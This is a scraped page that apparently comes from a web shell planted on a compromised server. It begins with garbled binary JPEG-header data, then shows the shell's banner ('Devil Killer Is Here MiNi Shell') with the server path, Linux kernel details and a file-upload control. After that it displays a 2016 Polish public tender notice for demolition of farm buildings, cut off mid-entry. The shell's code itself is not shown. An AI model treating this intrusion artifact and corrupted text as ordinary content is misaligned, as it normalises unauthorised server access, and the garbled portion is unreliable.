JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160622/99443-N-2016.html

<p class="kh_header"><b>Wrocław: Roboty rozbiórkowe</b><br>
<b>Numer ogłoszenia: 99443 - 2016; data zamieszczenia: 22.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu , ul. Mińska 60, 54-610 Wrocław, woj. dolnośląskie, tel. 71 356 39 19, faks 71 357 90 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Osoba Prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty rozbiórkowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie podzielono na 4 odrębne przedmioty zamówienia.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-9, 45.11.12.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Na potwierdzenie, że wykonawca posiada uprawnienia do wykonywania usług objętych zamówieniem Wykonawca zobowiązany jest załączyć do oferty:
2.1	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)	Na potwierdzenie, że wykonawca posiada niezbędną wiedzę i doświadczenie - to jest wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, roboty budowlane w zakresie rozbiórek obiektów budowlanych o łącznej kubaturze tych obiektów nie mniejszej niż 1.000,00 m3 - Wykonawca zobowiązany jest załączyć do oferty:
2.2.	Wykaz wykonanych robót budowlanych, z podaniem ich rodzaju i wartości, daty i miejsca wykonania 
2.3.	Dowody potwierdzające, że roboty budowlane z wykazu określonego wg wzoru formularza ofertowego zostały wykonane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Dowodami potwierdzającymi czy robota została wykonana należycie są:
- poświadczenie (referencje) lub inny dokument potwierdzający należyte wykonanie robót budowlanych jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest wstanie uzyskać poświadczenia. 
W razie konieczności, szczególnie, gdy wykaz robót lub dowody potwierdzające czy roboty zostały wykonane należycie budzą wątpliwości zamawiającego, zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz, którego roboty były wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio zamawiającemu.
2.4.	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza wniosku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)	Na potwierdzenie, ze wykonawca dysponuje odpowiednim potencjałem technicznym, Wykonawca zobowiązany jest załączyć do oferty:
2.3	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)	Na potwierdzenie, ze wykonawca dysponuje  osobami zdolnymi do wykonania zamówienia. Wykonawca zobowiązany jest załączyć do oferty:
2.2	Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacją na temat ich kwalifikacji zawodowych niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami, wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. uprawnienia do nadzorowania i kierowania robotami budowlanymi w branży: konstrukcyjno - budowlanej, oraz oświadczenia o posiadaniu ważnego zaświadczenia o przynależności do izby zawodowej - wg wzoru formularza ofertowego
2.3	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>d)	Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Wykonawca zobowiązany jest załączyć do oferty:
2.4	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.95</li>
<li>2 - Termin realizacji zamówienia - 0.05</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej okoliczności wymienionej poniżej:
1.	Zmiana terminu realizacji przedmiotu umowy. 
1.1	Zmiany spowodowane warunkami atmosferycznymi w szczególności:
a)	klęski żywiołowe,
b)	udokumentowane warunki atmosferyczne uniemożliwiające realizację przedmiotu umowy.
1.2	Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego:
a)	wstrzymanie realizacji przedmiotu umowy przez Zamawiającego, 
b)	konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji technicznej, 
c)	opóźnienia w przekazaniu placu budowy przez Zamawiającego. 
1.3	Zmiany będące następstwem działania osób trzecich. 
1.4	Zmiany będące następstwem działania organów administracji w szczególności przekroczenie określonych przez prawo terminów wydania przez organy administracji decyzji, zezwoleń itp.
1.5	Zmiany będące następstwem zdarzeń losowych, o których niezwłocznie poinformowano Zamawiającego.
2.	Zmiany Osobowe: 
a)	zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami o których mowa w ustawie Prawo budowlane lub innych uprawnieniach,
b)	zmiana koordynatora lub osób odpowiedzialnych za nadzór nad prawidłowym wykonywaniem zamówienia po stronie Zamawiającego.
3.	Pozostałe Zmiany:
a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ,
b)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana rachunku bankowego, umowy, zmiana adresu, itp.).
4.	 Powyższe postanowienia stanowią katalog zmian, na które Zamawiający dopuszcza zgodę, Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu, 54-610 Wrocław, ul.Mińska 60,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.07.2016 godzina 11:00, miejsce: Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu, 54-610 Wrocław, ul. Mińska 60, kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 2.8	W przypadku powierzenia części robót podwykonawcom Zamawiający wymaga wskazania w ofercie zakresu robót, które będą wykonywane przez podwykonawców - wg wzoru formularza ofertowego.(w przypadku niezłożeni w ofercie stosownego dokumentu zamawiający uzna iż wykonawca nie zamierza powierzyć części robót podwykonawcą i cały zakres prac wykona samodzielnie).
2.9	Na podstawie art. 24 ust. 2a ustawy PZP, Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych, jeżeli zamawiający przewidział taką możliwość wykluczenia wykonawcy w ogłoszeniu o zamówieniu, w specyfikacji istotnych warunków zamówienia lub w zaproszeniu do negocjacji. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.
2.10	W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty musi być załączone pełnomocnictwo posiadające zakres, podpisane przez osoby reprezentujące osobę prawną lub fizyczną. W przypadku złożenia oferty wspólnej przez dwa lub więcej podmiotów wymagane jest załączenie pełnomocnictwa ustanawiającego pełnomocnika, o którym mowa w art.23 ust. 2 ustawy PZP uprawnionego do wspólnej reprezentacji, bezpośredniego kontaktowania się i współdziałania z Zamawiającym w trakcie realizacji przedmiotu zamówienia. Pełnomocnictwo powinno zawierać informacje o stronach konsorcjum oraz określenie wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem przedmiot zamówienia. Każdy z podmiotów występujących wspólnie zobowiązany jest do załączenia do oferty wymaganych przez Zamawiającego dokumentów i oświadczeń, potwierdzających spełnienie warunków w zakresie nie podlegania wykluczeniu z postępowania na podstawie art. 24 ust 1 ustawy PZP.
2.11	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonywaniu zamówienia. 
2.12	Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art.26 ust 2b ustawy PZP, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą w skutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. 
2.13	Uwaga: Wymienione dokumenty mogą być przedstawione w formie oryginału albo kserokopii z poświadczeniem za zgodność z oryginałem. Ofertę i jej załączniki podpisuje osoba (osoby) podana w wyciągu z rejestru, lub upoważniona w umowie (statucie) do składania majątkowych oświadczeń woli w imieniu firmy lub osoba, której udzielono pełnomocnictwa na zasadach zapisanych w kodeksie cywilnym (pełnomocnictwo stanowi załącznik do oferty). Dokumenty sporządzone w języku obcym winne być składane wraz z tłumaczeniem na język polski..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiot 1 	Rozbiórka silosu oraz budynku chlewni wraz z posadzkami i fundamentami znajdujących się na działce nr 234/9 w miejscowości Zameczno, obręb Domanowice, gmina Żukowice, powiat głogowski..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozbiórka silosu bez numeru inwentarzowego do wysokości 0,5 poniżej terenu  i  budynku chlewni nr inwentarzowy 119/182 wraz z posadzką i fundamentem oraz pozostałych ścian i fundamentów (mur wzdłuż drogi) znajdujących się na działce nr 234/9 w miejscowości Zameczno, obręb Domanowice, gmina Żukowice, powiat głogowski. Występującą na budynku chlewni papę należy poddać utylizacji. Po wyburzeniu obiektów, teren uporządkować, nawieźć ziemią urodzajną grubości 20cm i obsiać trawą. Teren całej działki oczyścić z odpadów komunalnych, krzaków i wykonać jej koszenie. Po zakończeniu robót należy wykonać dokumentację  geodezyjną powykonawczą obejmującą:
-geodezyjna inwentaryzacja powykonawcza (mapa) 
-wykaz zmian ewidencyjnych: stan dotychczasowy oraz stan nowy 
-wykaz zmian danych ewidencyjnych dotyczących budynków 
Według wiedzy Zamawiającego , przeznaczone do rozbiórki budynki nie posiadają reperów, jednakże w przypadku ich ujawnienia w trakcie rozbiórki, do obowiązków Wykonawcy należy ich odtworzenie zgodnie z wymogami Prawa Geodezyjnego.
-budynek chlewni dwukondygnacyjny (parter i poddasze nieużytkowe) o powierzchni zabudowy 250m2 i kubaturze 1800m3. Wymiary budynku: długość 31m, szerokość 8,81m, wysokość do kalenicy 6,92m.- ściany z cegły ,posadzka cementowa, strop odcinkowy z cegły,  dach konstrukcji drewnianej, dwupołaciowy kryty papą asfaltową, stolarka okienna stalowa szklona, drzwiowa drewniana.
-silos  przykryty żelbetową płytą panwiową o wymiarach 3,2x10,3x2,6,  -fundamenty betonowe, ściany z cegły, posadzka cementowa
Szczegółowy zakres prac  określony został w przedmiarze i  STWiOR
wyżej wymieniona dokumentacja stanowi załącznik do niniejszej specyfikacji i znajduje się na stronie internetowej Zamawiającego www.anr.gov.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-9, 45.11.12.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. Termin realizacji zamówienia - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiot 2 	Rozbiórka budynku kuźni - stodoły wraz z posadzkami i fundamentami znajdującego się na działce nr 65/15 w miejscowości Glinica, obręb Zabłocie, gmina Żukowice, powiat głogowski, powiat lubiński..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozbiórka budynku kuźnia - stodoła nr inwentarzowy 058/181, wraz z posadzką i fundamentami, znajdującego się na działce nr 65/18 w miejscowości Glinica, obręb Zabłocie, gmina Żukowice, powiat głogowski.
Po wyburzeniu obiektu, teren uporządkować, nawieźć ziemią urodzajną grubości 20cm i obsiać trawą. Teren w obrębie 6m od budynku oczyścić z krzaków i  odpadów komunalnych oraz wykonać jego koszenie. 
Po zakończeniu robót należy wykonać dokumentację  geodezyjną powykonawczą obejmującą:
-geodezyjna inwentaryzacja powykonawcza (mapa) 
-wykaz zmian ewidencyjnych: stan dotychczasowy oraz stan nowy 
-wykaz zmian danych ewidencyjnych dotyczących budynków 
Według wiedzy Zamawiającego , przeznaczone do rozbiórki budynki nie posiadają reperów, jednakże w przypadku ich ujawnienia w trakcie rozbiórki, do obowiązków Wykonawcy należy ich odtworzenie zgodnie z wymogami Prawa Geodezyjnego.
- budynek kuźnia-stodoła jednokondygnacyjny częściowo podpiwniczony o powierzchni zabudowy 450m2 i kubaturze 2470m3. Wymiary budynku: długość 36m, szerokość 12,76, wysokość do kalenicy 12,14m - ściany z cegły , strop nad piwnicą odcinkowy z cegły, dach konstrukcji drewnianej kryty dachówką częściowo zawalony  
Szczegółowy zakres prac określony został w przedmiarze i STWiOR, wyżej wymieniona dokumentacja stanowi załącznik do niniejszej specyfikacji i znajduje się na stronie internetowej Zamawiającego www.anr.gov.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-9, 45.11.12.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. Termin realizacji zamówienia - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiot 3 	Rozbiórka dwóch obór oraz wiaty znajdujących się na działkach nr 110/2 i 109 oraz dwóch budynków gospodarczych znajdujących się na działce nr 94/59 w miejscowości Nieszczyce, gmina Rudna..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozbiórka dwóch obór nr inwentarzowy 048/182 i 52/182 oraz wiaty nr inwentarzowy 108/001884, znajdujących się na działkach nr 110/2 i 109 i dwóch budynków gospodarczych bez numerów inwentarzowych znajdujących się  na działce nr 94/59 w miejscowości Nieszczyce, gmina Rudna, powiat lubiński. Występującą na budynkach papę i eternit należy poddać utylizacji. 
